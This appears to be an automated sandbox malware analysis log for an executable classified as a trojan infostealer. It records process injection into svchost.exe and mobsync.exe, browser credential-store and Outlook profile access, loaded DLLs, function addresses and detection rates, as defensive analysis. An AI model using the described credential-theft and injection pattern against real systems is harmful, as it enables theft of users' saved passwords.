                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A40CF26_2_04A40CF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A50C006_2_04A50C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A68DBF6_2_04A68DBF
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A4ADE06_2_04A4ADE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A5AD006_2_04A5AD00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AECD1F6_2_04AECD1F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0CE936_2_04B0CE93
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A62E906_2_04A62E90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0EEDB6_2_04B0EEDB
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0EE266_2_04B0EE26
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A50E596_2_04A50E59
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04ACEFA06_2_04ACEFA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A5CFE06_2_04A5CFE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A42FC86_2_04A42FC8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A92F286_2_04A92F28
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A70F306_2_04A70F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AF2F306_2_04AF2F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AC4F406_2_04AC4F40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A368B86_2_04A368B8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A7E8F06_2_04A7E8F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A528406_2_04A52840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A5A8406_2_04A5A840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A529A06_2_04A529A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B1A9A66_2_04B1A9A6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A669626_2_04A66962
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A4EA806_2_04A4EA80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B06BD76_2_04B06BD7
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0AB406_2_04B0AB40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0F43F6_2_04B0F43F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A414606_2_04A41460
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AED5B06_2_04AED5B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B195C36_2_04B195C3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B075716_2_04B07571
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B016CC6_2_04B016CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A956306_2_04A95630
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0F7B06_2_04B0F7B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0F0E06_2_04B0F0E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B070E96_2_04B070E9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AFF0CC6_2_04AFF0CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A570C06_2_04A570C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A5B1B06_2_04A5B1B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A8516C6_2_04A8516C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A3F1726_2_04A3F172
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B1B16B6_2_04B1B16B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A552A06_2_04A552A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AF12ED6_2_04AF12ED
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A6B2C06_2_04A6B2C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A9739A6_2_04A9739A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0132D6_2_04B0132D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A3D34C6_2_04A3D34C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0FCF26_2_04B0FCF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AC9C326_2_04AC9C32
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A6FDC06_2_04A6FDC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B07D736_2_04B07D73
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A53D406_2_04A53D40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B01D5A6_2_04B01D5A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A59EB06_2_04A59EB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0FFB16_2_04B0FFB1
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A51F926_2_04A51F92
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0FF096_2_04B0FF09
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A538E06_2_04A538E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04ABD8006_2_04ABD800
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AE59106_2_04AE5910
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A599506_2_04A59950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A6B9506_2_04A6B950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AEDAAC6_2_04AEDAAC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A95AA06_2_04A95AA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AF1AA36_2_04AF1AA3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AFDAC66_2_04AFDAC6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AC3A6C6_2_04AC3A6C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B07A466_2_04B07A46
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0FA496_2_04B0FA49
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A6FB806_2_04A6FB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A8DBF96_2_04A8DBF9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AC5BF06_2_04AC5BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0FB766_2_04B0FB76
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A41CB06_2_02A41CB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A3CB806_2_02A3CB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A3AEC46_2_02A3AEC4
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A3AED06_2_02A3AED0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A3CDA06_2_02A3CDA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A3AD806_2_02A3AD80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A453406_2_02A45340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A435406_2_02A43540
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A5BA306_2_02A5BA30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486E50B6_2_0486E50B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486E7416_2_0486E741
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486E2886_2_0486E288
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486E3A36_2_0486E3A3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0487533C6_2_0487533C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486D8086_2_0486D808
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486CA986_2_0486CA98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 101 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: String function: 003D6AC0 appears 42 times
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: String function: 003DF8A0 appears 35 times
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: String function: 003CEC2F appears 68 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A97E54 appears 111 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04ACF290 appears 105 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A85130 appears 58 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A3B970 appears 280 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04ABEA12 appears 86 times
                Source: qbSIgCrCgw.exe, 00000000.00000003.1441550593.0000000003733000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs qbSIgCrCgw.exe
                Source: qbSIgCrCgw.exe, 00000000.00000003.1441720418.00000000038DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs qbSIgCrCgw.exe
                Source: qbSIgCrCgw.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/13
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FCE7A GetLastError,FormatMessageW,0_2_003FCE7A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003EAB84 AdjustTokenPrivileges,CloseHandle,0_2_003EAB84
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003EB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003EB134
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003FE1FD
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_003F6532
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0040C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0040C18C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003B406B
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeFile created: C:\Users\user\AppData\Local\Temp\aut9FD0.tmpJump to behavior
                Source: qbSIgCrCgw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1858071682.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1858125277.0000000002EA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: qbSIgCrCgw.exeReversingLabs: Detection: 75%
                Source: qbSIgCrCgw.exeVirustotal: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\qbSIgCrCgw.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"Jump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: qbSIgCrCgw.exeStatic file information: File size 1223168 > 1048576
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: qbSIgCrCgw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WafZCahkNS.exe, 00000004.00000000.1588467968.000000000042E000.00000002.00000001.01000000.00000005.sdmp, WafZCahkNS.exe, 00000008.00000002.3899225250.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: qbSIgCrCgw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: qbSIgCrCgw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: qbSIgCrCgw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: qbSIgCrCgw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: qbSIgCrCgw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CE01E LoadLibraryA,GetProcAddress,0_2_003CE01E
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003C288A push 66003C23h; retn 0042h0_2_003C28E1
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D6B05 push ecx; ret 0_2_003D6B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350225F pushad ; ret 2_2_035027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035027FA pushad ; ret 2_2_035027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx2_2_035309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350283D push eax; iretd 2_2_03502858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350135E push eax; iretd 2_2_03501369
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A409AD push ecx; mov dword ptr [esp], ecx6_2_04A409B6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A48330 pushfd ; retf 6_2_02A4833B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A42414 push ecx; retf 6_2_02A4244C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A50E12 push edx; iretd 6_2_02A50E13
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A50FE1 push cs; ret 6_2_02A50FE2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A40CCA push esp; ret 6_2_02A40CCB
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A44C09 push esi; iretd 6_2_02A44C0C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A4ED60 push esi; retf 6_2_02A4ED6B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A450FF push esi; retf 6_2_02A4510A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A3F03C push ebp; retf 6_2_02A3F03D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A37A6B push ebp; iretd 6_2_02A37A6D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04870695 push ebx; ret 6_2_04870696
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_0486469F push edi; ret 6_2_048646A2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_048657E0 push esp; ret 6_2_048657E1
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04875182 push eax; ret 6_2_04875184
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00418111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00418111
